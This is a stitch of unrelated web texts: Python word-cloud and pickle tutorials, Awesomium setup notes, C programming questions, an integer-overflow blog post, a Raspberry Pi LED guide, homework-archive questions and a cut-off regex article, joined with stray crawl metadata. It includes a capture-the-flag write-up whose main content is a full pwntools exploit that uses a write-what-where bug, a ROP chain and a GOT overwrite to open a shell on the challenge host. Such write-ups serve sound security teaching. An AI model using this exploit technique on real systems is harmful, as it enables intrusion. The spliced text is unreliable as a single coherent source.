subreddits = ['/r/circlejerk', '/r/gaming', '/r/FloridaMan', '/r/movies',
'/r/science', '/r/Seahawks', '/r/totallynotrobots',
'/r/uwotm8', '/r/videos', '/r/worldnews']
for sub in subreddits:
    cursor = db.post.find({"subreddit": sub})
    for doc in cursor:
        with open("text_files/%s.txt" % sub[3:], 'a') as f:
            f.write(doc['title'])
            f.write('\n\n')
            f.write(doc['top_comment'])
            f.write('\n\n')

client.close()
The first two lines after the imports are there to change the default encoding from ASCII to UTF-8, in order to properly decode emojis (of which there were many in the comments). Finally, we use these text files to generate the word clouds:
import numpy as np
from PIL import Image
from wordcloud import WordCloud
subs = ['circlejerk', 'FloridaMan', 'gaming', 'movies',
'science', 'Seahawks', 'totallynotrobots',
'uwotm8', 'videos', 'worldnews']
for sub in subs:
    text = open('text_files/%s.txt' % sub).read()
    reddit_mask = np.array(Image.open('reddit_mask.jpg'))
    wc = WordCloud(background_color="black", mask=reddit_mask)
    wc.generate(text)
    wc.to_file('wordclouds/%s.jpg' % sub)
The WordCloud object uses reddit_mask.jpg as a canvas: it only fills in words in the black area. Here's an example of what we get (generated from posts on /r/totallynotrobots):
After all of this, I am now a big fan of Scrapy and everything it can do, but this project has certainly only scratched the surface of its capabilities.
If you care to see the rest of the word clouds you can find them here; the code for this project can be found here.
These notes are for developing a C++ application. If you are developing a .NET/C# application, please see our .NET Wiki instead.
Checklist
Before we begin, you’ll need the following:
- The latest Awesomium 1.7 SDK for Mac OSX (download it here)
- An Intel Mac running Mac OS X 10.6 (“Snow Leopard”) or higher.
- XCode 3.1.2 or higher
Install the SDK
Run the installer and follow the on-screen instructions.
Once installation is complete you should find samples under your
/Applications directory and a copy of
Awesomium.framework at
/Library/Frameworks
Set up your project
Configure project settings
- Create a new project in XCode (either a Cocoa Application or Command Line Tool).
- Double click your project to open Project Info and select the Build tab.
- Select All Configurations in the Configuration drop-down list.
- Under the Architectures property, make sure 32-bit Universal is selected.
- Under the Valid Architectures property, remove all architectures except i386.
- Under the Framework Search Paths property (you may need to scroll down a bit to find it), add the path that contains the Awesomium.framework you copied earlier.
Link against the framework
To use Awesomium in your Mac OSX application, you will need to link against the Awesomium framework.
There are actually a couple of ways you can do this:
- Drag and drop Awesomium.framework onto the name of your project in XCode’s Groups & Files panel. In the dialog that appears, make sure your project is selected under Add To Targets.
- OR double-click the name of your Application under the Targets list in XCode’s Groups & Files panel. Select the General tab and then click the + symbol under Linked Libraries. Click Add Other at the bottom of the dialog that appears and then browse to and select Awesomium.framework.
Copy the framework to your build distribution
If you don’t wish to install
Awesomium.framework to your users’
/Library/Frameworks folder, there are a couple other ways to bundle the framework with your application based on what you’re building.
If your project is using an Application Bundle (e.g., you’re creating a Cocoa Application):
- Right-click your Application’s name under Targets in XCode’s Groupes & Files panel.
- Select Add -> New Build Phase -> New Copy Files Build Phase.
- In the dialog that appears, select Frameworks under the Destination drop-down list.
- Close the dialog.
- Expand your Application’s list of build phases (just click the little triangle next to your Application’s name under Targets to expand the list).
- Drag and drop Awesomium.framework onto the Copy Files build phase that you just created (should be the one at the bottom of the list).
- The Awesomium framework should automatically be copied into your Application Bundle every time you build your application.
If your project is NOT using an Application Bundle (e.g., you’re creating a Shell Tool):
- Create a folder named Frameworks in the directory above the directory that contains your built executable (this will usually end up being the build directory of your XCode project).
- Copy Awesomium.framework to the Frameworks folder.
- Your directory structure should look like the following:
+---SomeDirectory
¦   +---YourExecutable
+---Frameworks
    +---Awesomium.framework
Include the API
To include the entire API for Awesomium in your source files, you simply need to include WebCore.h.
#include <Awesomium/WebCore.h>
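As a rough sketch of a first call into the API (written from memory of the 1.7 C++ API, so treat the exact calls as an assumption and check the bundled samples for authoritative usage):

int main() {
  // Initialize the WebCore singleton with a default configuration
  // (WebConfig and these method names are assumed from the 1.7 API).
  Awesomium::WebCore* core = Awesomium::WebCore::Initialize(Awesomium::WebConfig());

  // ... create WebViews, pump core->Update() in your loop, render pages ...

  Awesomium::WebCore::Shutdown();
  return 0;
}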
Sometimes we may wish to save Python objects to disk (for example if we have performed a lot of processing to get to a certain point). We can use Python's pickle method to save and reload any Python object. Here we will save and reload a NumPy array, and then save and reload a collection of different objects.
Saving a single python object
Here we will use pickle to save a single object, a NumPy array.
import pickle
import numpy as np

# Create array of random numbers:
my_array = np.random.rand(2,4)
print (my_array)

Out:
[[0.6383297  0.45250192 0.09882854 0.84896196]
 [0.97006917 0.29206495 0.92500062 0.52965801]]
# Save using pickle
filename = 'pickled_array.p'
with open(filename, 'wb') as filehandler:
    pickle.dump(my_array, filehandler)
Reload and print pickled array:
filename = 'pickled_array.p'
with open(filename, 'rb') as filehandler:
    reloaded_array = pickle.load(filehandler)

print ('Reloaded array:')
print (reloaded_array)

Out:
Reloaded array:
[[0.6383297  0.45250192 0.09882854 0.84896196]
 [0.97006917 0.29206495 0.92500062 0.52965801]]
Using a tuple to save multiple objects
We can use pickle to save a collection of objects grouped together as a list, a dictionary, or a tuple. Here we will save a collection of objects as a tuple.
# Create an array, a list, and a dictionary
my_array = np.random.rand(2,4)
my_list = ['A', 'B', 'C']
my_dictionary = {'name': 'Bob', 'Age': 42}
# Save all items in a tuple
items_to_save = (my_array, my_list, my_dictionary)
filename = 'pickled_tuple_of_objects.p'
with open(filename, 'wb') as filehandler:
    pickle.dump(items_to_save, filehandler)
Reload pickled tuple, unpack the objects, and print them.
filename = 'pickled_tuple_of_objects.p'
with open(filename, 'rb') as filehandler:
    reloaded_tuple = pickle.load(filehandler)

reloaded_array = reloaded_tuple[0]
reloaded_list = reloaded_tuple[1]
reloaded_dict = reloaded_tuple[2]

print ('Reloaded array:')
print (reloaded_array)
print ('\nReloaded list:')
print (reloaded_list)
print ('\n Reloaded dictionary')
print (reloaded_dict)

Out:
Reloaded array:
[[0.40193978 0.55173167 0.89411291 0.84625061]
 [0.86540981 0.27835353 0.43359222 0.31579122]]

Reloaded list:
['A', 'B', 'C']

Reloaded dictionary
{'name': 'Bob', 'Age': 42}
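One small addition beyond the examples above: for large objects such as big NumPy arrays, passing an explicit protocol makes pickling faster and the files smaller (the filename here is arbitrary):

with open('pickled_array.p', 'wb') as filehandler:
    pickle.dump(my_array, filehandler, protocol=pickle.HIGHEST_PROTOCOL)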
Hi, I'm a novice when it comes to programming. Right now I'm in college taking my first class on C++, but our first homework assignment is in C.
Anyways, the first programming assignment is fairly large and I've been working on it for a few days now.
However, there's a certain part of the program where I'd love to utilize structures and dynamically allocated arrays for a specific purpose.
I created a test program in C to kinda test out what I want to do...but I can't get it to compile. (If it doesn't compile, then surely it won't work in the grand scheme of things.)
I would be grateful if anyone can point me in the right direction and help me find a solution for what I want to accomplish.
Basically I'm trying to create a structure that contains a dynamically allocated array of structures, with each of these structures containing a dynamically allocated array of integers. So far I've been unsuccessful in getting something like this to compile (I use g++ if that matters)...
I've fiddled around a bit...but I can't get it to compile. What am I doing wrong? Is there some kind of looping involved?

Code:
#include <stdio.h>
#include <stdlib.h>

// I want to create a "parent structure"
// that is capable of holding a dynamically allocated
// array of "child structures"
//
// each of these "child structures" would then hold
// a dynamically allocated array of integers..

// "child structure"
typedef struct {
    int *numbers; // dynamically allocated array of ints
} child_structure;

// "parent structure"
typedef struct {
    child_structure *items; // dynamically allocated array of child stucts
} parent_structure;

int main(void)
{
    parent_structure test;
    int N, n;

    // first i dynamically allocate the array of child structures...
    test.items = (child_structure *)malloc(sizeof(child_structure) * N);

    // then i dynamically allocate the array of integers in each of child structures
    // ... at least that's what i'm trying to do!
    test.items.numbers = (int *)malloc(sizeof(int) * n);

    return (0);
}
Thanks in advance for the help.
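For reference, a sketch of the allocation pattern the poster seems to be after (not part of the original thread; N and n would need real values before the calls): the inner arrays must be allocated once per child, so a loop is indeed involved, and the member access needs an index, test.items[i].numbers rather than test.items.numbers.

test.items = (child_structure *)malloc(sizeof(child_structure) * N);
for (int i = 0; i < N; i++)
    test.items[i].numbers = (int *)malloc(sizeof(int) * n);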
I came across a lovely bug lately. Integer arithmetic, especially in C and C++ it seems, is error-prone. In addition to the risk of having the wrong expressions altogether (a logic error, one could say), integer arithmetic is subject to a number of pitfalls, some I have already discussed here, here, and here. This week, I discuss yet another occasion for error using integer arithmetic.
Consider this piece of code, one that you have seen many times probably, at least as a variation on the theme:
int cost = INT_MAX;
/* here goes code that may or mayn't assign cost */
int adjusted_cost = cost + extra_cost;
if (cost + extra_cost < best_cost)
    best_cost = adjusted_cost;
Can you see what’s the problem with this code (besides the fact that it may or mayn’t assign cost)? Think it over before continuing.
*
* *
The problem is that since cost is int and is initialized to INT_MAX, adding anything (other than zero) to it will cause it to overflow and wrap around, which means that cost+extra_cost is now negative, and is therefore (very possibly) smaller than best_cost. The exact behavior is implementation-specific, but it will break the algorithm.
There are basically three solutions to this kind of problem. The first is to test whether or not the value is INT_MAX. The condition becomes something like:
if ((cost != INT_MAX) && (cost + extra_cost < best_cost)) { ...
(You may have noticed that this version isn't much safer. If cost is INT_MAX-1 and extra_cost is 10, then it's still broken. In fact, it is complicated to get arbitrary expressions like this one to behave correctly in all cases, that is, regardless of the values involved.)
The second solution is to replace int by an explicitly larger type but to use the same constant:
#include <stdint.h>
...
int64_t cost = INT32_MAX;
Now cost+extra_cost cannot overflow/wrap-around, and the code now behaves the way it was intended, but at the cost of manipulating larger integers (which can have implementation-specific performance issues).
The third solution requires analyzing your algorithm and knowing what are the values you operate on. What is the largest possible value for cost for this algorithm? Maybe it’s 100, maybe it’s 1 000 000, or maybe it’s 200 000 000? Maybe with extra_cost always less than 1024 and cost at 1 000 000 will provide safe arithmetic in all cases. Adjusting the maximal cost to a reasonable maximum that is far from INT_MAX is a variation on the theme of using uint64_t instead of only int except that it uses int (chosen as to be a machine-efficient size) and it provides an occasion to understand and document your algorithm.
*
* *
The basic fact is that getting integer arithmetic exactly right all the time given two’s complement, modular arithmetic (and thus finite integer sizes) is really complicated. Not always, but I invite the reader to consider again the second solution above, or even the original expression. Can you write a test that checks both for overflow and test the condition correctly? How many special case will it have? What if I change int to unsigned? will it still work?
If both values are unsigned (short, int), testing for (a+b)<max(a,b) correctly detects overflows for all possible pairs of a and b. If the values are signed, it fails on many negative pairs of a and b, for example, -32768 + -17488 will yield 15280 (assuming 16 bits integers). One possible solution is to compute the carry; if there’s a carry, there’s an overflow. While the carry is readily available to the CPU, C doesn’t help much here; you’ll have to write your own:
int will_overflow(int16_t i, int16_t j)
{
    int16_t s = i + j;
    int32_t s32 = i + j;
    return s != s32;
}
Your will_overflow function doesn’t really work, it returns “yes, it will overflow” for something as simple as -32768 and 0. I think there was a formula for checking for overflow in Hacker’s Delight, I’ll take a look when I’ll finally find this book.
The original
is clearly defective, as you rightly point out. I will fix that to:
Does what it should. I’ve been looking in Hacker’s Delight and what is presented there seems to depends on the sign of the operands (leaving two branches of tests.) It does have the merit of not necessitating bigger registers to perform its tests.
I found it:
No branches ;)
Well, the above code is for addition, for subtraction the formula is ((i^j)&(difference^i))>>15.
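(Editor's illustration, not part of the original comment thread: the branch-free sign-bit tests being quoted can be sketched as below; the addition formula is inferred from the subtraction one above, and the usual Hacker's Delight caveats about shifting signed values apply.)

#include <stdint.h>

/* Nonzero (in fact negative) result indicates overflow. */
int add_overflows(int16_t i, int16_t j)
{
    int16_t s = i + j;                  /* wraps on overflow */
    return (~(i ^ j) & (s ^ i)) >> 15;  /* same signs in, different sign out */
}

int sub_overflows(int16_t i, int16_t j)
{
    int16_t d = i - j;
    return ((i ^ j) & (d ^ i)) >> 15;   /* the formula quoted in the comment */
}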
By the way, could you fix the tags (and possibly merge the comments), please?
Excellent!
You may find this interesting:
It’s about integer wrapper types that automatically detects any overflow or divide by zero. It looks very useful. I wish it was included in boost.
I always avoided this issue by just assigning it to a large number instead of INT_MAX. For example, if you know the value is unlikely to be more than 10,000,000 you can just put 9999999 or something.
Almost as bad as contracting “may not” to “main’t”
Simple Python RGB Raspberry Pi Tutorial
Introduction: Simple Python RGB Raspberry Pi Tutorial
Step 1: The Circuit
The circuit is very simple. You can also use a breadboard and some jumper cables.
Follow the schematic and solder the components on the perfboard. Use a common-cathode RGB LED and three resistors: 120 Ohm resistors for the blue and green pins and a 100 Ohm resistor for the red pin.
Step 2: Plug the Circuit
Now plug the circuit onto the Raspberry Pi's GPIO pins, connecting the red, green, and blue leads to GPIO 25, 24, and 23 and the common cathode to ground.
Step 3: Connect to the Raspberry Pi by Terminal
Now power up the Raspberry Pi and open a terminal session on it.
Step 4: Write the Program
Type on the terminal:
sudo nano rgb.py
After this, put the following code into the editor window.
(see the py file)
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
RED = 25
GREEN = 24
BLUE = 23
GPIO.setup(RED,GPIO.OUT)
GPIO.output(RED,0)
GPIO.setup(GREEN,GPIO.OUT)
GPIO.output(GREEN,0)
GPIO.setup(BLUE,GPIO.OUT)
GPIO.output(BLUE,0)
try:
    while (True):
        request = raw_input("RGB-->")
        if (len(request) == 3):
            GPIO.output(RED, int(request[0]))
            GPIO.output(GREEN, int(request[1]))
            GPIO.output(BLUE, int(request[2]))
except KeyboardInterrupt:
    GPIO.cleanup()
Push CTRL + X button and save the rgb.py file.
Step 5: Command the RGB LED From the Terminal
Now you can start the program.
Write
sudo python rgb.py
You will see the prompt RGB-->
Now use 0 to turn a color off and 1 to turn it on.
The first digit controls red, the second green, and the third blue.
For blue, write 001 and then press Enter.
For green, write 010 and then press Enter.
For red, write 100 and then press Enter.
The fun comes when you start mixing colors.
Try 101, press Enter, and see the color.
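If you want shades beyond the eight on/off combinations, RPi.GPIO's software PWM can dim each channel. A minimal sketch for one channel (my addition, not part of the original tutorial):

import RPi.GPIO as GPIO

GPIO.setmode(GPIO.BCM)
GPIO.setup(25, GPIO.OUT)

red = GPIO.PWM(25, 100)    # 100 Hz on the red pin
red.start(0)               # duty cycle 0-100 sets brightness
red.ChangeDutyCycle(50)    # half brightness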
file_reader
Description
You found a service that is hard to understand. Will you be able to exploit it?
TL;DR
This service reads two lines from the user, the first one is used to define the offset at which the data of the second line will be written.
The user input is a string of characters consisting of numbers, which is transformed into a 32-bit integer and then into a 64-bit signed integer.
The program doesn’t display anything and so it has no function to leak the libc address or a stack value (no
printf,
puts, etc.).
The exploit consists of several steps which consist in making a stack lifting, reading step 2 in the
.bss segment, calculating the address of the one_gadget from a GOT entry and getting a shell.
Reverse engineering
After some time of analysis, we get the following functions:
get_line()
Description: read user input and return if it starts with “END” or ‘\n’.
convert()
Description: convert the user input to a 32-bits integer, signed on 64 bits.
write_what_where()
Description: write the line_2 at the line_1 stack offset.
main()
Description: get two lines, convert them to integers and call write_what_where until the lines don’t start with “END” or “\n”.
Methodology
We’ve a write_what_where primitive, but we can’t read data so we can’t leak libc address from a GOT entry or from the stack.
Since we’re able to write anywhere on the stack (as long as the offset doesn’t exceed the size of a 32-bit integer), we should be able to
overwrite the return address of the
get_line function and create a ROP that will allow us to resolve a libc function address and call it.
The magic gadget
Reading the assembly instructions of the program, we find the following sequence:
It’s a valuable gadget allowing us to add the value of
rax register to the value contained in
rbp-0x30 and to store the result at
rbp-0x18.
What makes this gadget so magic is that it will allow us to take the address of a libc function (for example a GOT entry) and store the address
of another function (for example the system address).
GOT entries
Looking at the
.got.plt section, we see that the program imports five functions from the libc:
The exploit will consist of placing the offset of a libc function in the rax register, adding it to the __libc_start_main function address, overwriting a GOT entry with the calculated address, and calling it.
Final exploit
#!/usr/bin/env python
from pwn import *
import ctypes

context.clear(arch='amd64', os='linux', log_level='info')

LOCAL = False
p = None

def int64(value):
    return ctypes.c_int(value).value

# gdb -q ./vuln -p $(pgrep -f vuln) -ex 'b *0x400771'
def create_process(local=LOCAL):
    global p
    if local:
        p = process(context.binary.path)
    else:
        p = remote(host='filereader.chall.malicecyber.com', port=30303)

def write(what, where, qword=True):
    parts = [
        (what >> 0) & 0xffffffff,
    ]
    if qword:
        parts.append((what >> 32) & 0xffffffff)
    for i, part in enumerate(parts):
        payload = b''
        payload += str(int64(where+i)).encode('latin-1')
        payload += b'\n'
        payload += str(int64(part)).encode('latin-1')
        p.sendline(payload)

# Load ELF files.
elf = context.binary = ELF('./vuln', checksec=False)

# Add symbols.
elf.sym['write_what_where'] = 0x400749
elf.sym['get_line'] = 0x4005d6
elf.sym['convert'] = 0x400637
elf.sym['main'] = 0x400772

# Create process and pause the script so that we have the time to run gdb over this process.
create_process()
# pause()

# Gadgets.
# ropper --file ./vuln -r -a x86_64 --search "mov [%]"
mov_rax_ptr_rbp_min18__add_rsp_0x38__pop_rbx_rbp = 0x40073e
add_rsp_0x38__pop_rbx_rbp = 0x400742
get_line = elf.sym['get_line']+0x8
pop_rsi_r15 = 0x400881
pop_rbx_rbp = 0x400746
call_rbp48 = 0x4005d5
pop_rdi = 0x400883
pop_r15 = 0x400882
magic = 0x4006a9
ret = 0x400471

# Variables.
bss_buf = elf.bss()+0x80

##
# Stage 1 - stack lifting + read in BSS.
#
offset = -0x36; write(0xdeadbeef, offset)      # rbx (junk)
offset += 2;    write(bss_buf+0x18, offset)    # rbp (bss)
offset += 2;    write(pop_rdi, offset)         # pop rdi
offset += 2;    write(bss_buf, offset)         # rdi (buffer)
offset += 2;    write(pop_rsi_r15, offset)     # pop rsi, r15
offset += 2;    write(0xffff, offset)          # rsi (size)
offset += 2;    write(0xdeadbeef, offset)      # r15 (junk)
offset += 2;    write(get_line, offset)        # call fgets(rdi, rsi, stdin)

# Actual pivot.
write(add_rsp_0x38__pop_rbx_rbp, -0x46, qword=False)  # overwrite LSB of return address (we can't make two writes before return)

##
# Stage 2 - compute one_gadget address + call one_gadget.
#
# one_gadget ./libc.so.6
if LOCAL:
    libc = ELF(elf.libc.path, checksec=False)
    one_gadget = 0x3f35a
else:
    libc = ELF('./libc.so.6', checksec=False)
    one_gadget = 0x41374

one_gadget_offset = one_gadget - libc.sym['__libc_start_main']

# Junk value + some value to be popped out.
payload = b''
payload += pack(0xdeadbeef)          # junk value
payload += pack(one_gadget_offset)   # rax value (popped before calling magic gadget)
payload += pack(ret)*2               # retsled (junk)

# Overwrite strlen@got with popret.
payload += pack(pop_rbx_rbp)         # pop rbx, rbp
payload += pack(0xdeadbeef)          # rbx (junk)
payload += pack(bss_buf+0x60)        # rbp
payload += pack(pop_rdi)             # pop rdi
payload += pack(elf.got['strlen'])   # rdi
payload += pack(pop_rsi_r15)         # pop rsi, r15
payload += pack(0x8)                 # rsi
payload += pack(0xdeadbeef)          # r15
payload += pack(get_line)            # call fgets(rdi, rsi, stdin)

# Place one_gadget_offset in rax register.
payload += pack(pop_rbx_rbp)         # pop rbx, rbp
payload += pack(0xdeadbeef)          # rbx (junk)
payload += pack(bss_buf+0x20)        # rbp
payload += pack(mov_rax_ptr_rbp_min18__add_rsp_0x38__pop_rbx_rbp)  # add rsp, 0x38; pop rbx, rbp
payload += cyclic(0x38)              # junk for stack lifting
payload += pack(0xdeadbeef)          # rbx (junk)
payload += pack(elf.got['__libc_start_main']+0x30)  # rbp

# Overwrite __gmon_start__@got with do_system.
payload += pack(magic)

# Call __gmon_start__@got (actually call do_system).
payload += pack(pop_rbx_rbp)         # pop rbx, rbp
payload += pack(0xdeadbeef)          # rbx (junk)
payload += pack(elf.got['__gmon_start__']-0x48)  # rbp
payload += pack(call_rbp48)          # call qword ptr [rbp+0x48]

p.sendline(payload)                  # send stage 2.
p.sendline(pack(pop_r15))            # send strlen@got value.

p.interactive()
p.close()
Download link: exploit.py.
Keep it simple, stupid!
Something that annoys me and wastes my time on a daily basis is forgetting the KISS principle: I tend to do simple things in a stupid, overkill way.
This challenge is a perfect illustration of this problem… The first time I looked at this challenge, I didn’t directly understand the conversion that was done on the user input, so I visualized the process like this:
The idea here was to get a chosen output from an unknown input. So I thought about implementing a script based on a SAT solver allowing me to solve the equation inside the “black box process” while specifying additional constraints on the input and intermediate values (e.g., the input must be an unsigned integer).
A friend of mine told me that these 50 lines of code could probably be simplified… He was right:
from z3 import *

def sat_solve(value):
    # Get a line that allows us to get the chosen output value.
    max_line_size = 10
    s = Solver()
    line = [BitVec(f'line_{i}', 64) for i in range(max_line_size)]
    inter = [BitVec(f'inter_{i}', 64) for i in range(max_line_size)]
    out = BitVec('out', 64)
    for i in range(max_line_size):
        s.add(line[i] >= ord('0'))
        s.add(line[i] <= ord('9'))
        if i != 0:
            s.add(inter[i-1] <= 0x7fffffff)
            s.add(inter[i] == line[i] - 0x30 + 10 * inter[i-1])
        else:
            s.add(inter[i] == line[i] - 0x30 + 10 * 0)
    if value >= 0:
        s.add(inter[-1] == value)
        s.add(out == inter[-1])
    else:
        s.add(out == inter[-1]*-1)
        s.add(inter[-1] <= 0x80000000)
        s.add(out & 0xffffffff == value*-1)
    if (s.check() == sat):
        model = s.model()
        final = ''
        for i in range(max_line_size):
            curr_line_value = model[line[i]].as_long()
            curr_inter_value = model[inter[i]].as_long()
            final += chr(curr_line_value)
        final = int(final, 10)  # remove 0 padding
    else:
        print(f'unsat (value={value})')
    return final

sat_solve(-0xdeadbeef)
vs:
import ctypes

def int64(value):
    return ctypes.c_int(value).value

int64(-0xdeadbeef)
Keep it simple, stupid!
Flag
The final flag is:
ReadMyFlagg!!!!\o/
Happy Hacking!
Computer Science Archive: Questions from December 25, 2011
- Anonymous asked: The ERP system of Virtual University consists of three subsystems, "VIS", "LMS" and "EXAMS", all deployed on the same web server and sharing a central database (installed on the same web server).
However due to the increased number of students, VU decides to deploy these sub systems on separate web servers named VIS-Server, LMS-Server and EXAMS-Server, still all sharing a central database.
However this time the database will be installed and managed by a separate database server which will be implemented through oracle server.
Now the clients (students and instructors) can connect and request the services from these servers under following protocols:
1) Students can connect only to LMS-Server and can request services from it.
2) Instructors can connect with all three servers (i.e. LMS-Server, VIS-Server, and EXAMS-Server) and can request the desired service.
3) These servers can also connect with each other to get services as when required.
4) No client i.e. neither the students nor the instructors can directly connect with database server.
Question:
Keeping in mind Kruchten's 4+1 architectural view model, draw a diagram to represent the deployment view (also called the physical view) of the above system.
Also explain the diagram within four to five lines.
Note:
1. Carefully study the 4+1 architectural view model before attempting the assignment.
2. You can use any set of notations to draw the diagram.
3. Explanation should not exceed more than 5 lines.
1 answer
- haddam10 asked:
This assignment is about Arrays:
Complete the body of the function swap_arrays() in the program below to swap the input arrays ar1 and ar2. Notice that these two formal parameters correspond to the actual parameters firstar and secondar in the main() function:
firstar:  {1, 3, 5, 7, 9}    (indices 0-4)
secondar: {2, 4, 6, 8, 10}   (indices 0-4)
After executing the line (see main() function)
swap_arrays(firstar,secondar);
The two arrays will be swapped as shown below:
firstar:  {2, 4, 6, 8, 10}   (indices 0-4)
secondar: {1, 3, 5, 7, 9}    (indices 0-4)
The program to be completed is shown below:
#include <stdio.h>
#define ARRAY_SIZE 5

void swap_arrays(int ar1[], int ar2[]);

int main()
{
    int firstar[] = {1,3,5,7,9};
    int secondar[] = {2,4,6,8,10};
    swap_arrays(firstar, secondar);
    printf("Let us check that the swap was done successfully\n");
    printf("Printing the array firstar\n");
    for (int i = 0; i < ARRAY_SIZE; i++)
        printf("firstar[ %d] = %d\n", i, firstar[i]);
    printf("Printing the array secondar\n");
    for (int i = 0; i < ARRAY_SIZE; i++)
        printf("secondar[ %d] = %d\n", i, secondar[i]);
    return 0;
}

void swap_arrays(int ar1[], int ar2[])
{
}

3 answers
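For reference, one possible body for swap_arrays() (an illustrative sketch, not one of the archived answers): swap element by element through a temporary variable.

void swap_arrays(int ar1[], int ar2[])
{
    for (int i = 0; i < ARRAY_SIZE; i++) {
        int temp = ar1[i];   /* hold ar1's element */
        ar1[i] = ar2[i];
        ar2[i] = temp;
    }
}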
- Anonymous asked: (Duplicate Elimination) Use a one-dimensional array to solve the following problem: read in 20 numbers; as the values are read, display only the unique values that the user entered. Provide for the "worst case" in which all 20 numbers are different. Use the smallest possible array to solve this problem.
4 answers
- Anonymous asked:
Write a C++ program that maintains a sample address book system stored in a sequential text file and processed using a linked list data structure.
Your program will use a dynamic linked list built using a self-referential structure. The program will allow for the allocation and use of memory as needed. For instance, if the user wants to add a new record, then immediately (at run time, hence dynamically) a new memory allocation is requested and the new record is stored there. If another record is requested, then yet another memory allocation is made and "linked" to the first one to form a linked list data structure.
A contact record contains the following items:
- Last name (string),
- First name (string),
- City (string),
- Phone number (string).
The records are kept in a sequential text file named "contactlist.txt". In this file you will store all the records in a format that you would be able to read back later when requested and display the contents accordingly.
Important considerations:
Your program should:
- Be menu driven and make use of some enumeration to represent the different options as per the provided executable (see sample run note)
- Be interactive and allow requests from the user. Keep interacting with the user until "quit" is selected from the menu.
- The phone number is entered as a local number only (that is no need for any codes etc). Note that in the file it should be stored as originally entered.
- Use a sequential text data file to store your records. Your program should read the text file records into a linked list data structure when it starts execution, and, before it exists, write the records from the linked list structure to the same data file overwriting the old content of the data file.
- For simplicity, when a file is saved, the contents of the existing files are wiped out and replaced. When a file is loaded, the contents of the list in memory is wiped out and loaded with the new values.
- You can assume that the name of city is made of a single word.
- Assume no duplicate records are in the data.
- Implement a linear search that is capable of searching your entire list based on the last name.
- Write any functions you feel are necessary.
contactlist.txt:
Ali
Noora
Dubai
34526672
Salem
Abdualla
Muscat
68774618
Al-Arabi
Fatima
Nizwa
12345678
Elhadi
Mohamed
Zawia
23445678
3 answers
- Anonymous asked: You are required to write an Assembly program that shall be executed as a Terminate and Stay Resident (TSR) program and performs the following operations.
• When the key h is pressed, string Hello will be displayed on screen.
• When the key w is pressed, string World will be displayed on screen.
• When the key c is pressed, whole screen will be cleared.
3 answers
- sullyjr33 asked:
Write a main function and the following functions to compute the stress and strain in a steel rod of diameter D (inches) and length L (inches) subject to compression loads P of 10,000 to 1,000,000 lbs in increments of 100,000 pounds. The modulus of elasticity E for steel is 30 x 10^6 psi.
Function to compute stress from the formulas
Stress: f = P/A, where A = πD²/4.0
Function to compute strain from the formulas
Elongated or shortened length: ΔL = fL/E; strain: e = ΔL/L = f/E
Function to output the stress and strain at different loads of P
Main: calculate stress, calculate strain, output.
4 answers
- Anonymous asked: I got this program which compiled successfully but, when I execute it, it keeps saying "The system cannot find the file specified." How do I create files that the program can read from and write to? What should I call these files so the program can find them? Here is the program:
import java.io.*;
class InputOutput
{
public static void main(String args[])throws Exception
{
FileReader fr = new FileReader("Hello.in");
FileWriter fw = new FileWriter("Hello.out");
int ch;
ch = fr.read();
while(ch != -1)
{
if((char)ch>='A' && (char)ch<='Z')
ch = ch +('a'-'A');
fw.write((char)ch);
ch = fr.read();
}
fr.close();
fw.close();
}
}
5 answers
- Anonymous asked:
Implement INSERTION-SORT and MERGE-SORT in the programming language of your choice. Determine experimentally the largest value of n (number of elements in the sequence to be sorted) for which INSERTION-SORT is still faster than MERGE-SORT.
Now modify your code for MERGE-SORT such that it calls INSERTION-SORT as a subroutine for input sizes not greater than the value determined by experiment.
Draw a diagram that shows the running times of INSERTION-SORT, MERGE-SORT and the hybrid INSERTION-MERGE-SORT algorithm for various input sizes n. You should perform all your experiments on the same machine and using the same programming language. Since the actual running time depends on the input sequence, use several random input sequences to produce an average running time for each value of n tested.
Briefly describe the observed behavior of the three algorithms for values of n both smaller and larger than the cross-over value determined experimentally. Also hand in a printed copy of the code used in the experiments.
Note:
You may use the system time to measure the running time of an algorithm with high precision (up to milliseconds). The function below shows one way to do this in C++ and returns the current time in milliseconds.
#include <windows.h>  /* for SYSTEMTIME and GetSystemTime */
int time_s()
{ //computes system time in milliseconds
SYSTEMTIME st;
GetSystemTime(&st);
int time1 = (st.wHour*60*60*1000) + (st.wMinute*60*1000) + (st.wSecond*1000) + (st.wMilliseconds);
return time1;
}3 answers
- Anonymous asked:
A chief minister office is designed in such a way that there is a waiting room adjoining the minister’s office. Waiting room has two doors D1 and D2, D1 opens inside the minister’s room and D2 is used for entrance from out side. Waiting room has N chairs for some contractors who have to see chief minister. If the minister is busy, the door D1 is closed and arriving contractor sits in one of the available chairs. If a contractor enters the waiting room and all chairs are occupied, the contractor leaves the office without meeting. If there are no contractors in the waiting room, the minister goes to rest (sleep) in the chair with the door D1 open. If minister is asleep, the contractor makes the minister awake by ringing the bell and gets meeting with him.
While keeping in mind the given scenario, you have to write the pseudo code OR a code fragment using semaphores to define a synchronization scheme for the contractor and chief minister.
4 answers
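This is the classic sleeping-barber pattern; one possible sketch (names and details are illustrative, not from the original question):

semaphore minister = 0;      // contractors waiting to be called in
semaphore contractors = 0;   // wakes the sleeping minister
semaphore mutex = 1;         // protects 'waiting'
int waiting = 0;             // contractors currently seated

Contractor():
    wait(mutex)
    if (waiting < N):
        waiting = waiting + 1
        signal(contractors)   // wake the minister if asleep
        signal(mutex)
        wait(minister)        // wait to be called through door D1
        // hold the meeting
    else:
        signal(mutex)         // all chairs taken: leave the office

Minister():
    while (true):
        wait(contractors)     // sleep when nobody is waiting
        wait(mutex)
        waiting = waiting - 1
        signal(minister)      // call the next contractor in
        signal(mutex)
        // conduct the meeting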
|
http://www.chegg.com/homework-help/questions-and-answers/computer-science-archive-2011-december-25
|
CC-MAIN-2014-52
|
refinedweb
| 1,751
| 60.45
|
4 Applications of Regular Expressions that every Data Scientist should know (with Python code)!
Overview
- Regular Expressions or Regex is a versatile tool that every Data Scientist should know about
- Regex can automate various mundane data processing tasks
- Learn about 4 exciting applications of Regex and how to implement them in Python
Introduction
You have seen them, heard about them and probably have already used them for various tasks, without even realizing what happens under the hood? Yes, I’m talking about none other than – Regular Expressions; the quintessential skill for a data scientist’s tool kit!
Regular Expressions are useful for numerous practical day to day tasks that a data scientist encounters. They are used everywhere from data pre-processing to natural language processing, pattern matching, web scraping, data extraction and what not!
That’s why I wanted to write this article, to list some of those mundane tasks that you or your data team can automate with the help of Regular Expressions.
In case your basics of Regex are a bit hazy, I recommend you to read this article for a quick recap:
Table of Contents
- Extracting emails from a Text Document
